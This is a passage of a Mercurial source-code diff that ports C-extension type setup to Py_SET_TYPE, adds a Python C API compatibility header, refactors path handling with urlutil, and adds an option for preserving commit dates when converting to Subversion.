PyBuffer_Release(&source); @@ -1659,7 +1659,7 @@ }; void compressor_module_init(PyObject* mod) { - Py_TYPE(&ZstdCompressorType) = &PyType_Type; + Py_SET_TYPE(&ZstdCompressorType, &PyType_Type); if (PyType_Ready(&ZstdCompressorType) < 0) { return; } diff --git a/contrib/python-zstandard/c-ext/compressoriterator.c b/contrib/python-zstandard/c-ext/compressoriterator.c --- a/contrib/python-zstandard/c-ext/compressoriterator.c +++ b/contrib/python-zstandard/c-ext/compressoriterator.c @@ -228,7 +228,7 @@ }; void compressoriterator_module_init(PyObject* mod) { - Py_TYPE(&ZstdCompressorIteratorType) = &PyType_Type; + Py_SET_TYPE(&ZstdCompressorIteratorType, &PyType_Type); if (PyType_Ready(&ZstdCompressorIteratorType) < 0) { return; } diff --git a/contrib/python-zstandard/c-ext/decompressionreader.c b/contrib/python-zstandard/c-ext/decompressionreader.c --- a/contrib/python-zstandard/c-ext/decompressionreader.c +++ b/contrib/python-zstandard/c-ext/decompressionreader.c @@ -774,7 +774,7 @@ void decompressionreader_module_init(PyObject* mod) { /* TODO make reader a sub-class of io.RawIOBase */ - Py_TYPE(&ZstdDecompressionReaderType) = &PyType_Type; + Py_SET_TYPE(&ZstdDecompressionReaderType, &PyType_Type); if (PyType_Ready(&ZstdDecompressionReaderType) < 0) { return; } diff --git a/contrib/python-zstandard/c-ext/decompressionwriter.c b/contrib/python-zstandard/c-ext/decompressionwriter.c --- a/contrib/python-zstandard/c-ext/decompressionwriter.c +++ b/contrib/python-zstandard/c-ext/decompressionwriter.c @@ -288,7 +288,7 @@ }; void decompressionwriter_module_init(PyObject* mod) { - Py_TYPE(&ZstdDecompressionWriterType) = &PyType_Type; + Py_SET_TYPE(&ZstdDecompressionWriterType, &PyType_Type); if (PyType_Ready(&ZstdDecompressionWriterType) < 0) { return; } diff --git a/contrib/python-zstandard/c-ext/decompressobj.c b/contrib/python-zstandard/c-ext/decompressobj.c --- a/contrib/python-zstandard/c-ext/decompressobj.c +++ b/contrib/python-zstandard/c-ext/decompressobj.c @@ -195,7 +195,7 @@ }; void decompressobj_module_init(PyObject* module) { - Py_TYPE(&ZstdDecompressionObjType) = &PyType_Type; + Py_SET_TYPE(&ZstdDecompressionObjType, &PyType_Type); if (PyType_Ready(&ZstdDecompressionObjType) < 0) { return; } diff --git a/contrib/python-zstandard/c-ext/decompressor.c b/contrib/python-zstandard/c-ext/decompressor.c --- a/contrib/python-zstandard/c-ext/decompressor.c +++ b/contrib/python-zstandard/c-ext/decompressor.c @@ -1811,7 +1811,7 @@ }; void decompressor_module_init(PyObject* mod) { - Py_TYPE(&ZstdDecompressorType) = &PyType_Type; + Py_SET_TYPE(&ZstdDecompressorType, &PyType_Type); if (PyType_Ready(&ZstdDecompressorType) < 0) { return; } diff --git a/contrib/python-zstandard/c-ext/decompressoriterator.c b/contrib/python-zstandard/c-ext/decompressoriterator.c --- a/contrib/python-zstandard/c-ext/decompressoriterator.c +++ b/contrib/python-zstandard/c-ext/decompressoriterator.c @@ -242,7 +242,7 @@ }; void decompressoriterator_module_init(PyObject* mod) { - Py_TYPE(&ZstdDecompressorIteratorType) = &PyType_Type; + Py_SET_TYPE(&ZstdDecompressorIteratorType, &PyType_Type); if (PyType_Ready(&ZstdDecompressorIteratorType) < 0) { return; } diff --git a/contrib/python-zstandard/c-ext/frameparams.c b/contrib/python-zstandard/c-ext/frameparams.c --- a/contrib/python-zstandard/c-ext/frameparams.c +++ b/contrib/python-zstandard/c-ext/frameparams.c @@ -128,7 +128,7 @@ }; void frameparams_module_init(PyObject* mod) { - Py_TYPE(&FrameParametersType) = &PyType_Type; + Py_SET_TYPE(&FrameParametersType, &PyType_Type); if (PyType_Ready(&FrameParametersType) < 0) { return; } diff --git a/contrib/python-zstandard/c-ext/python-zstandard.h b/contrib/python-zstandard/c-ext/python-zstandard.h --- a/contrib/python-zstandard/c-ext/python-zstandard.h +++ b/contrib/python-zstandard/c-ext/python-zstandard.h @@ -9,6 +9,7 @@ #define PY_SSIZE_T_CLEAN #include <Python.h> #include "structmember.h" +#include <pythoncapi_compat.h> #define ZSTD_STATIC_LINKING_ONLY #define ZDICT_STATIC_LINKING_ONLY diff --git a/contrib/python-zstandard/zstd/common/pythoncapi_compat.h b/contrib/python-zstandard/zstd/common/pythoncapi_compat.h new file mode 100644 --- /dev/null +++ b/contrib/python-zstandard/zstd/common/pythoncapi_compat.h @@ -0,0 +1,283 @@ +// Header file providing new functions of the Python C API to old Python +// versions. +// +// File distributed under the MIT license. +// +// Homepage: +// https://github.com/pythoncapi/pythoncapi_compat +// +// Latest version: +// https://raw.githubusercontent.com/pythoncapi/pythoncapi_compat/master/pythoncapi_compat.h + +#ifndef PYTHONCAPI_COMPAT +#define PYTHONCAPI_COMPAT + +#ifdef __cplusplus +extern "C" { +#endif + +#include <Python.h> +#include "frameobject.h" // PyFrameObject, PyFrame_GetBack() + + +/* VC 2008 doesn't know about the inline keyword. */ +#if defined(_MSC_VER) && _MSC_VER < 1900 +#define inline __forceinline +#endif + +// Cast argument to PyObject* type. +#ifndef _PyObject_CAST +# define _PyObject_CAST(op) ((PyObject*)(op)) +#endif + + +// bpo-42262 added Py_NewRef() to Python 3.10.0a3 +#if PY_VERSION_HEX < 0x030a00A3 && !defined(Py_NewRef) +static inline PyObject* _Py_NewRef(PyObject *obj) +{ + Py_INCREF(obj); + return obj; +} +#define Py_NewRef(obj) _Py_NewRef(_PyObject_CAST(obj)) +#endif + + +// bpo-42262 added Py_XNewRef() to Python 3.10.0a3 +#if PY_VERSION_HEX < 0x030a00A3 && !defined(Py_XNewRef) +static inline PyObject* _Py_XNewRef(PyObject *obj) +{ + Py_XINCREF(obj); + return obj; +} +#define Py_XNewRef(obj) _Py_XNewRef(_PyObject_CAST(obj)) +#endif + + +// bpo-39573 added Py_SET_REFCNT() to Python 3.9.0a4 +#if PY_VERSION_HEX < 0x030900A4 && !defined(Py_SET_REFCNT) +static inline void _Py_SET_REFCNT(PyObject *ob, Py_ssize_t refcnt) +{ + ob->ob_refcnt = refcnt; +} +#define Py_SET_REFCNT(ob, refcnt) _Py_SET_REFCNT((PyObject*)(ob), refcnt) +#endif + + +// bpo-39573 added Py_SET_TYPE() to Python 3.9.0a4 +#if PY_VERSION_HEX < 0x030900A4 && !defined(Py_SET_TYPE) +static inline void +_Py_SET_TYPE(PyObject *ob, PyTypeObject *type) +{ + ob->ob_type = type; +} +#define Py_SET_TYPE(ob, type) _Py_SET_TYPE((PyObject*)(ob), type) +#endif + + +// bpo-39573 added Py_SET_SIZE() to Python 3.9.0a4 +#if PY_VERSION_HEX < 0x030900A4 && !defined(Py_SET_SIZE) +static inline void +_Py_SET_SIZE(PyVarObject *ob, Py_ssize_t size) +{ + ob->ob_size = size; +} +#define Py_SET_SIZE(ob, size) _Py_SET_SIZE((PyVarObject*)(ob), size) +#endif + + +// bpo-40421 added PyFrame_GetCode() to Python 3.9.0b1 +#if PY_VERSION_HEX < 0x030900B1 +static inline PyCodeObject* +PyFrame_GetCode(PyFrameObject *frame) +{ + PyCodeObject *code; + assert(frame != NULL); + code = frame->f_code; + assert(code != NULL); + Py_INCREF(code); + return code; +} +#endif + +static inline PyCodeObject* +_PyFrame_GetCodeBorrow(PyFrameObject *frame) +{ + PyCodeObject *code = PyFrame_GetCode(frame); + Py_DECREF(code); + return code; // borrowed reference +} + + +// bpo-40421 added PyFrame_GetCode() to Python 3.9.0b1 +#if PY_VERSION_HEX < 0x030900B1 +static inline PyFrameObject* +PyFrame_GetBack(PyFrameObject *frame) +{ + PyFrameObject *back; + assert(frame != NULL); + back = frame->f_back; + Py_XINCREF(back); + return back; +} +#endif + +static inline PyFrameObject* +_PyFrame_GetBackBorrow(PyFrameObject *frame) +{ + PyFrameObject *back = PyFrame_GetBack(frame); + Py_XDECREF(back); + return back; // borrowed reference +} + + +// bpo-39947 added PyThreadState_GetInterpreter() to Python 3.9.0a5 +#if PY_VERSION_HEX < 0x030900A5 +static inline PyInterpreterState * +PyThreadState_GetInterpreter(PyThreadState *tstate) +{ + assert(tstate != NULL); + return tstate->interp; +} +#endif + + +// bpo-40429 added PyThreadState_GetFrame() to Python 3.9.0b1 +#if PY_VERSION_HEX < 0x030900B1 +static inline PyFrameObject* +PyThreadState_GetFrame(PyThreadState *tstate) +{ + PyFrameObject *frame; + assert(tstate != NULL); + frame = tstate->frame; + Py_XINCREF(frame); + return frame; +} +#endif + +static inline PyFrameObject* +_PyThreadState_GetFrameBorrow(PyThreadState *tstate) +{ + PyFrameObject *frame = PyThreadState_GetFrame(tstate); + Py_XDECREF(frame); + return frame; // borrowed reference +} + + +// bpo-39947 added PyInterpreterState_Get() to Python 3.9.0a5 +#if PY_VERSION_HEX < 0x030900A5 +static inline PyInterpreterState * +PyInterpreterState_Get(void) +{ + PyThreadState *tstate; + PyInterpreterState *interp; + + tstate = PyThreadState_GET(); + if (tstate == NULL) { + Py_FatalError("GIL released (tstate is NULL)"); + } + interp = tstate->interp; + if (interp == NULL) { + Py_FatalError("no current interpreter"); + } + return interp; +} +#endif + + +// bpo-39947 added PyInterpreterState_Get() to Python 3.9.0a6 +#if 0x030700A1 <= PY_VERSION_HEX && PY_VERSION_HEX < 0x030900A6 +static inline uint64_t +PyThreadState_GetID(PyThreadState *tstate) +{ + assert(tstate != NULL); + return tstate->id; +} +#endif + + +// bpo-37194 added PyObject_CallNoArgs() to Python 3.9.0a1 +#if PY_VERSION_HEX < 0x030900A1 +static inline PyObject* +PyObject_CallNoArgs(PyObject *func) +{ + return PyObject_CallFunctionObjArgs(func, NULL); +} +#endif + + +// bpo-39245 made PyObject_CallOneArg() public (previously called +// _PyObject_CallOneArg) in Python 3.9.0a4 +#if PY_VERSION_HEX < 0x030900A4 +static inline PyObject* +PyObject_CallOneArg(PyObject *func, PyObject *arg) +{ + return PyObject_CallFunctionObjArgs(func, arg, NULL); +} +#endif + + +// bpo-40024 added PyModule_AddType() to Python 3.9.0a5 +#if PY_VERSION_HEX < 0x030900A5 +static inline int +PyModule_AddType(PyObject *module, PyTypeObject *type) +{ + const char *name, *dot; + + if (PyType_Ready(type) < 0) { + return -1; + } + + // inline _PyType_Name() + name = type->tp_name; + assert(name != NULL); + dot = strrchr(name, '.'); + if (dot != NULL) { + name = dot + 1; + } + + Py_INCREF(type); + if (PyModule_AddObject(module, name, (PyObject *)type) < 0) { + Py_DECREF(type); + return -1; + } + + return 0; +} +#endif + + +// bpo-40241 added PyObject_GC_IsTracked() to Python 3.9.0a6. +// bpo-4688 added _PyObject_GC_IS_TRACKED() to Python 2.7.0a2. +#if PY_VERSION_HEX < 0x030900A6 +static inline int +PyObject_GC_IsTracked(PyObject* obj) +{ + return (PyObject_IS_GC(obj) && _PyObject_GC_IS_TRACKED(obj)); +} +#endif + +// bpo-40241 added PyObject_GC_IsFinalized() to Python 3.9.0a6. +// bpo-18112 added _PyGCHead_FINALIZED() to Python 3.4.0 final. +#if PY_VERSION_HEX < 0x030900A6 && PY_VERSION_HEX >= 0x030400F0 +static inline int +PyObject_GC_IsFinalized(PyObject *obj) +{ + return (PyObject_IS_GC(obj) && _PyGCHead_FINALIZED((PyGC_Head *)(obj)-1)); +} +#endif + + +// bpo-39573 added Py_IS_TYPE() to Python 3.9.0a4 +#if PY_VERSION_HEX < 0x030900A4 && !defined(Py_IS_TYPE) +static inline int +_Py_IS_TYPE(const PyObject *ob, const PyTypeObject *type) { + return ob->ob_type == type; +} +#define Py_IS_TYPE(ob, type) _Py_IS_TYPE((const PyObject*)(ob), type) +#endif + + +#ifdef __cplusplus +} +#endif +#endif // PYTHONCAPI_COMPAT diff --git a/contrib/win32/ReadMe.html b/contrib/win32/ReadMe.html --- a/contrib/win32/ReadMe.html +++ b/contrib/win32/ReadMe.html @@ -140,7 +140,7 @@ </p> <p> - Mercurial is Copyright 2005-2021 Matt Mackall and others. + Mercurial is Copyright 2005-2021 Olivia Mackall and others. </p> <p> diff --git a/contrib/win32/hg.bat b/contrib/win32/hg.bat --- a/contrib/win32/hg.bat +++ b/contrib/win32/hg.bat @@ -4,6 +4,8 @@ setlocal set HG=%~f0 +set PYTHONLEGACYWINDOWSSTDIO=1 + rem Use a full path to Python (relative to this script) if it exists, rem as the standard Python install does not put python.exe on the PATH... rem Otherwise, expect that python.exe can be found on the PATH. diff --git a/doc/Makefile b/doc/Makefile --- a/doc/Makefile +++ b/doc/Makefile @@ -6,7 +6,14 @@ PREFIX=/usr/local MANDIR=$(PREFIX)/share/man INSTALL=install -m 644 -PYTHON?=python +# Default to Python 3. +# +# Windows ships Python 3 as `python.exe`, which may not be on PATH. py.exe is. +ifeq ($(OS),Windows_NT) +PYTHON?=py -3 +else +PYTHON?=python3 +endif RSTARGS= export HGENCODING=UTF-8 diff --git a/doc/gendoc.py b/doc/gendoc.py --- a/doc/gendoc.py +++ b/doc/gendoc.py @@ -31,6 +31,7 @@ commands, encoding, extensions, + fancyopts, help, minirst, pycompat, @@ -86,6 +87,8 @@ if b'\n' in desc: # only remove line breaks and indentation desc = b' '.join(l.lstrip() for l in desc.split(b'\n')) + if isinstance(default, fancyopts.customopt): + default = default.getdefaultvalue() if default: default = stringutil.forcebytestr(default) desc += _(b" (default: %s)") % default @@ -314,7 +317,12 @@ ui.write(b"\n") # aliases if d[b'aliases']: - ui.write(_(b" aliases: %s\n\n") % b" ".join(d[b'aliases'])) + # Note the empty comment, this is required to separate this + # (which should be a blockquote) from any preceding things (such + # as a definition list). + ui.write( + _(b"..\n\n aliases: %s\n\n") % b" ".join(d[b'aliases']) + ) def allextensionnames(): @@ -327,6 +335,11 @@ doc = encoding.strtolocal(sys.argv[1]) ui = uimod.ui.load() + # Trigger extensions to load. This is disabled by default because it uses + # the current user's configuration, which is often not what is wanted. + if encoding.environ.get(b'GENDOC_LOAD_CONFIGURED_EXTENSIONS', b'0') != b'0': + extensions.loadall(ui) + if doc == b'hg.1.gendoc': showdoc(ui) else: diff --git a/doc/runrst b/doc/runrst --- a/doc/runrst +++ b/doc/runrst @@ -2,7 +2,7 @@ # # runrst - register custom roles and run correct writer # -# Copyright 2010 Matt Mackall <mpm@selenic.com> and others +# Copyright 2010 Olivia Mackall <olivia@selenic.com> and others # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/hg b/hg --- a/hg +++ b/hg @@ -2,7 +2,7 @@ # # mercurial - scalable distributed SCM # -# Copyright 2005-2007 Matt Mackall <mpm@selenic.com> +# Copyright 2005-2007 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/hgdemandimport/demandimportpy2.py b/hgdemandimport/demandimportpy2.py --- a/hgdemandimport/demandimportpy2.py +++ b/hgdemandimport/demandimportpy2.py @@ -1,6 +1,6 @@ # demandimport.py - global demand-loading of modules for Mercurial # -# Copyright 2006, 2007 Matt Mackall <mpm@selenic.com> +# Copyright 2006, 2007 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/hgext/absorb.py b/hgext/absorb.py --- a/hgext/absorb.py +++ b/hgext/absorb.py @@ -102,6 +102,9 @@ class emptyfilecontext(object): """minimal filecontext representing an empty file""" + def __init__(self, repo): + self._repo = repo + def data(self): return b'' @@ -212,7 +215,7 @@ if path in pctx: fctxs.append(pctx[path]) else: - fctxs.append(emptyfilecontext()) + fctxs.append(emptyfilecontext(pctx.repo())) fctxs.reverse() # note: we rely on a property of hg: filerev is not reused for linear diff --git a/hgext/blackbox.py b/hgext/blackbox.py --- a/hgext/blackbox.py +++ b/hgext/blackbox.py @@ -38,7 +38,7 @@ [blackbox] # Include nanoseconds in log entries with %f (see Python function # datetime.datetime.strftime) - date-format = '%Y-%m-%d @ %H:%M:%S.%f' + date-format = %Y-%m-%d @ %H:%M:%S.%f """ diff --git a/hgext/churn.py b/hgext/churn.py --- a/hgext/churn.py +++ b/hgext/churn.py @@ -38,11 +38,16 @@ def changedlines(ui, repo, ctx1, ctx2, fmatch): added, removed = 0, 0 diff = b''.join(patch.diff(repo, ctx1.node(), ctx2.node(), fmatch)) + inhunk = False for l in diff.split(b'\n'): - if l.startswith(b"+") and not l.startswith(b"+++ "): + if inhunk and l.startswith(b"+"): added += 1 - elif l.startswith(b"-") and not l.startswith(b"--- "): + elif inhunk and l.startswith(b"-"): removed += 1 + elif l.startswith(b"@"): + inhunk = True + elif l.startswith(b"d"): + inhunk = False return (added, removed) diff --git a/hgext/convert/__init__.py b/hgext/convert/__init__.py --- a/hgext/convert/__init__.py +++ b/hgext/convert/__init__.py @@ -1,6 +1,6 @@ # convert.py Foreign SCM converter # -# Copyright 2005-2007 Matt Mackall <mpm@selenic.com> +# Copyright 2005-2007 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. @@ -491,6 +491,22 @@ :convert.skiptags: does not convert tags from the source repo to the target repo. The default is False. + + Subversion Destination + ###################### + + Original commit dates are not preserved by default. + + :convert.svn.dangerous-set-commit-dates: preserve original commit dates, + forcefully setting ``svn:date`` revision properties. This option is + DANGEROUS and may break some subversion functionality for the resulting + repository (e.g. filtering revisions with date ranges in ``svn log``), + as original commit dates are not guaranteed to be monotonically + increasing. + + For commit dates setting to work destination repository must have + ``pre-revprop-change`` hook configured to allow setting of ``svn:date`` + revision properties. See Subversion documentation for more details. """ return convcmd.convert(ui, src, dest, revmapfile, **opts) diff --git a/hgext/convert/common.py b/hgext/convert/common.py --- a/hgext/convert/common.py +++ b/hgext/convert/common.py @@ -1,6 +1,6 @@ # common.py - common code for the convert extension # -# Copyright 2005-2009 Matt Mackall <mpm@selenic.com> and others +# Copyright 2005-2009 Olivia Mackall <olivia@selenic.com> and others # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/hgext/convert/convcmd.py b/hgext/convert/convcmd.py --- a/hgext/convert/convcmd.py +++ b/hgext/convert/convcmd.py @@ -1,6 +1,6 @@ # convcmd - convert extension commands definition # -# Copyright 2005-2007 Matt Mackall <mpm@selenic.com> +# Copyright 2005-2007 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/hgext/convert/cvs.py b/hgext/convert/cvs.py --- a/hgext/convert/cvs.py +++ b/hgext/convert/cvs.py @@ -1,6 +1,6 @@ # cvs.py: CVS conversion code inspired by hg-cvs-import and git-cvsimport # -# Copyright 2005-2009 Matt Mackall <mpm@selenic.com> and others +# Copyright 2005-2009 Olivia Mackall <olivia@selenic.com> and others # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/hgext/convert/darcs.py b/hgext/convert/darcs.py --- a/hgext/convert/darcs.py +++ b/hgext/convert/darcs.py @@ -1,6 +1,6 @@ # darcs.py - darcs support for the convert extension # -# Copyright 2007-2009 Matt Mackall <mpm@selenic.com> and others +# Copyright 2007-2009 Olivia Mackall <olivia@selenic.com> and others # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/hgext/convert/git.py b/hgext/convert/git.py --- a/hgext/convert/git.py +++ b/hgext/convert/git.py @@ -1,6 +1,6 @@ # git.py - git support for the convert extension # -# Copyright 2005-2009 Matt Mackall <mpm@selenic.com> and others +# Copyright 2005-2009 Olivia Mackall <olivia@selenic.com> and others # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. @@ -247,7 +247,8 @@ b'\n'.join(line.strip() for line in content.split(b'\n')), ) for sec in c.sections(): - s = c[sec] + # turn the config object into a real dict + s = dict(c.items(sec)) if b'url' in s and b'path' in s: self.submodules.append(submodule(s[b'path'], b'', s[b'url'])) diff --git a/hgext/convert/hg.py b/hgext/convert/hg.py --- a/hgext/convert/hg.py +++ b/hgext/convert/hg.py @@ -1,6 +1,6 @@ # hg.py - hg backend for convert extension # -# Copyright 2005-2009 Matt Mackall <mpm@selenic.com> and others +# Copyright 2005-2009 Olivia Mackall <olivia@selenic.com> and others # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/hgext/convert/subversion.py b/hgext/convert/subversion.py --- a/hgext/convert/subversion.py +++ b/hgext/convert/subversion.py @@ -97,6 +97,17 @@ return s.decode(fsencoding).encode('utf-8') +def formatsvndate(date): + return dateutil.datestr(date, b'%Y-%m-%dT%H:%M:%S.000000Z') + + +def parsesvndate(s): + # Example SVN datetime. Includes microseconds. + # ISO-8601 conformant + # '2007-01-04T17:35:00.902377Z' + return dateutil.parsedate(s[:19] + b' UTC', [b'%Y-%m-%dT%H:%M:%S']) + + class SvnPathNotFound(Exception): pass @@ -1158,12 +1169,7 @@ continue paths.append((path, ent)) - # Example SVN datetime. Includes microseconds. - # ISO-8601 conformant - # '2007-01-04T17:35:00.902377Z' - date = dateutil.parsedate( - date[:19] + b" UTC", [b"%Y-%m-%dT%H:%M:%S"] - ) + date = parsesvndate(date) if self.ui.configbool(b'convert', b'localtimezone'): date = makedatetimestamp(date[0]) @@ -1380,7 +1386,7 @@ return logstream(stdout) -pre_revprop_change = b'''#!/bin/sh +pre_revprop_change_template = b'''#!/bin/sh REPOS="$1" REV="$2" @@ -1388,15 +1394,26 @@ PROPNAME="$4" ACTION="$5" -if [ "$ACTION" = "M" -a "$PROPNAME" = "svn:log" ]; then exit 0; fi -if [ "$ACTION" = "A" -a "$PROPNAME" = "hg:convert-branch" ]; then exit 0; fi -if [ "$ACTION" = "A" -a "$PROPNAME" = "hg:convert-rev" ]; then exit 0; fi +%(rules)s echo "Changing prohibited revision property" >&2 exit 1 ''' +def gen_pre_revprop_change_hook(prop_actions_allowed): + rules = [] + for action, propname in prop_actions_allowed: + rules.append( + ( + b'if [ "$ACTION" = "%s" -a "$PROPNAME" = "%s" ]; ' + b'then exit 0; fi' + ) + % (action, propname) + ) + return pre_revprop_change_template % {b'rules': b'\n'.join(rules)} + + class svn_sink(converter_sink, commandline): commit_re = re.compile(br'Committed revision (\d+).', re.M) uuid_re = re.compile(br'Repository UUID:\s*(\S+)', re.M) @@ -1470,9 +1487,20 @@ self.is_exec = None if created: + prop_actions_allowed = [ + (b'M', b'svn:log'), + (b'A', b'hg:convert-branch'), + (b'A', b'hg:convert-rev'), + ] + + if self.ui.configbool( + b'convert', b'svn.dangerous-set-commit-dates' + ): + prop_actions_allowed.append((b'M', b'svn:date')) + hook = os.path.join(created, b'hooks', b'pre-revprop-change') fp = open(hook, b'wb') - fp.write(pre_revprop_change) + fp.write(gen_pre_revprop_change_hook(prop_actions_allowed)) fp.close() util.setflags(hook, False, True) @@ -1667,6 +1695,23 @@ revprop=True, revision=rev, ) + + if self.ui.configbool( + b'convert', b'svn.dangerous-set-commit-dates' + ): + # Subverson always uses UTC to represent date and time + date = dateutil.parsedate(commit.date) + date = (date[0], 0) + + # The only way to set date and time for svn commit is to use propset after commit is done + self.run( + b'propset', + b'svn:date', + formatsvndate(date), + revprop=True, + revision=rev, + ) + for parent in parents: self.addchild(parent, rev) return self.revid(rev) diff --git a/hgext/extdiff.py b/hgext/extdiff.py --- a/hgext/extdiff.py +++ b/hgext/extdiff.py @@ -91,7 +91,7 @@ from mercurial.i18n import _ from mercurial.node import ( - nullid, + nullrev, short, ) from mercurial import ( @@ -565,18 +565,18 @@ repo, [from_rev] + [to_rev], b'nowarn' ) ctx1a = scmutil.revsingle(repo, from_rev, None) - ctx1b = repo[nullid] + ctx1b = repo[nullrev] ctx2 = scmutil.revsingle(repo, to_rev, None) else: ctx1a, ctx2 = scmutil.revpair(repo, revs) if not revs: ctx1b = repo[None].p2() else: - ctx1b = repo[nullid] + ctx1b = repo[nullrev] # Disable 3-way merge if there is only one parent if do3way: - if ctx1b.node() == nullid: + if ctx1b.rev() == nullrev: do3way = False matcher = scmutil.match(ctx2, pats, opts) diff --git a/hgext/fastannotate/protocol.py b/hgext/fastannotate/protocol.py --- a/hgext/fastannotate/protocol.py +++ b/hgext/fastannotate/protocol.py @@ -20,6 +20,9 @@ wireprotov1peer, wireprotov1server, ) +from mercurial.utils import ( + urlutil, +) from . import context # common @@ -151,9 +154,9 @@ def annotatepeer(repo): ui = repo.ui - remotepath = ui.expandpath( - ui.config(b'fastannotate', b'remotepath', b'default') - ) + remotedest = ui.config(b'fastannotate', b'remotepath', b'default') + r = urlutil.get_unique_pull_path(b'fastannotate', repo, ui, remotedest) + remotepath = r[0] peer = hg.peer(ui, {}, remotepath) try: diff --git a/hgext/fetch.py b/hgext/fetch.py --- a/hgext/fetch.py +++ b/hgext/fetch.py @@ -19,9 +19,11 @@ lock, pycompat, registrar, - util, ) -from mercurial.utils import dateutil +from mercurial.utils import ( + dateutil, + urlutil, +) release = lock.release cmdtable = {} @@ -107,10 +109,9 @@ ) ) - other = hg.peer(repo, opts, ui.expandpath(source)) - ui.status( - _(b'pulling from %s\n') % util.hidepassword(ui.expandpath(source)) - ) + path = urlutil.get_unique_pull_path(b'fetch', repo, ui, source)[0] + other = hg.peer(repo, opts, path) + ui.status(_(b'pulling from %s\n') % urlutil.hidepassword(path)) revs = None if opts[b'rev']: try: @@ -180,7 +181,7 @@ if not err: # we don't translate commit messages message = cmdutil.logmessage(ui, opts) or ( - b'Automated merge with %s' % util.removeauth(other.url()) + b'Automated merge with %s' % urlutil.removeauth(other.url()) ) editopt = opts.get(b'edit') or opts.get(b'force_editor') editor = cmdutil.getcommiteditor(edit=editopt, editform=b'fetch') diff --git a/hgext/fix.py b/hgext/fix.py --- a/hgext/fix.py +++ b/hgext/fix.py @@ -131,8 +131,10 @@ import subprocess from mercurial.i18n import _ -from mercurial.node import nullrev -from mercurial.node import wdirrev +from mercurial.node import ( + nullrev, + wdirrev, +) from mercurial.utils import procutil @@ -433,8 +435,9 @@ if not (len(revs) == 1 and wdirrev in revs): cmdutil.checkunfinished(repo) rewriteutil.precheck(repo, revs, b'fix') - if wdirrev in revs and list( - mergestatemod.mergestate.read(repo).unresolved() + if ( + wdirrev in revs + and mergestatemod.mergestate.read(repo).unresolvedcount() ): raise error.Abort(b'unresolved conflicts', hint=b"use 'hg resolve'") if not revs: diff --git a/hgext/git/__init__.py b/hgext/git/__init__.py --- a/hgext/git/__init__.py +++ b/hgext/git/__init__.py @@ -90,7 +90,7 @@ return os.path.join(self.path, b'..', b'.hg', f) raise NotImplementedError(b'Need to pick file for %s.' % f) - def changelog(self, trypending): + def changelog(self, trypending, concurrencychecker): # TODO we don't have a plan for trypending in hg's git support yet return gitlog.changelog(self.git, self._db) diff --git a/hgext/git/gitlog.py b/hgext/git/gitlog.py --- a/hgext/git/gitlog.py +++ b/hgext/git/gitlog.py @@ -8,6 +8,7 @@ nullhex, nullid, nullrev, + sha1nodeconstants, wdirhex, ) from mercurial import ( @@ -217,7 +218,7 @@ n = nodeorrev # handle looking up nullid if n == nullid: - return hgchangelog._changelogrevision(extra={}) + return hgchangelog._changelogrevision(extra={}, manifest=nullid) hn = gitutil.togitnode(n) # We've got a real commit! files = [ @@ -422,6 +423,8 @@ class manifestlog(baselog): + nodeconstants = sha1nodeconstants + def __getitem__(self, node): return self.get(b'', node) diff --git a/hgext/histedit.py b/hgext/histedit.py --- a/hgext/histedit.py +++ b/hgext/histedit.py @@ -242,6 +242,7 @@ from mercurial.utils import ( dateutil, stringutil, + urlutil, ) pickle = util.pickle @@ -1040,11 +1041,12 @@ Used by initialization code""" if opts is None: opts = {} - dest = ui.expandpath(remote or b'default-push', remote or b'default') - dest, branches = hg.parseurl(dest, None)[:2] - ui.status(_(b'comparing with %s\n') % util.hidepassword(dest)) - - revs, checkout = hg.addbranchrevs(repo, repo, branches, None) + path = urlutil.get_unique_push_path(b'histedit', repo, ui, remote) + dest = path.pushloc or path.loc + + ui.status(_(b'comparing with %s\n') % urlutil.hidepassword(dest)) + + revs, checkout = hg.addbranchrevs(repo, repo, (path.branch, []), None) other = hg.peer(repo, opts, dest) if revs: @@ -1581,10 +1583,19 @@ def layout(mode): maxy, maxx = stdscr.getmaxyx() helplen = len(helplines(mode)) + mainlen = maxy - helplen - 12 + if mainlen < 1: + raise error.Abort( + _(b"terminal dimensions %d by %d too small for curses histedit") + % (maxy, maxx), + hint=_( + b"enlarge your terminal or use --config ui.interface=text" + ), + ) return { b'commit': (12, maxx), b'help': (helplen, maxx), - b'main': (maxy - helplen - 12, maxx), + b'main': (mainlen, maxx), } def drawvertwin(size, y, x): @@ -1614,63 +1625,60 @@ stdscr.clear() stdscr.refresh() while True: - try: - oldmode, _ = state[b'mode'] - if oldmode == MODE_INIT: - changemode(state, MODE_RULES) - e = event(state, ch) - - if e == E_QUIT: - return False - if e == E_HISTEDIT: - return state[b'rules'] + oldmode, unused = state[b'mode'] + if oldmode == MODE_INIT: + changemode(state, MODE_RULES) + e = event(state, ch) + + if e == E_QUIT: + return False + if e == E_HISTEDIT: + return state[b'rules'] + else: + if e == E_RESIZE: + size = screen_size() + if size != stdscr.getmaxyx(): + curses.resizeterm(*size) + + curmode, unused = state[b'mode'] + sizes = layout(curmode) + if curmode != oldmode: + state[b'page_height'] = sizes[b'main'][0] + # Adjust the view to fit the current screen size. + movecursor(state, state[b'pos'], state[b'pos']) + + # Pack the windows against the top, each pane spread across the + # full width of the screen. + y, x = (0, 0) + helpwin, y, x = drawvertwin(sizes[b'help'], y, x) + mainwin, y, x = drawvertwin(sizes[b'main'], y, x) + commitwin, y, x = drawvertwin(sizes[b'commit'], y, x) + + if e in (E_PAGEDOWN, E_PAGEUP, E_LINEDOWN, E_LINEUP): + if e == E_PAGEDOWN: + changeview(state, +1, b'page') + elif e == E_PAGEUP: + changeview(state, -1, b'page') + elif e == E_LINEDOWN: + changeview(state, +1, b'line') + elif e == E_LINEUP: + changeview(state, -1, b'line') + + # start 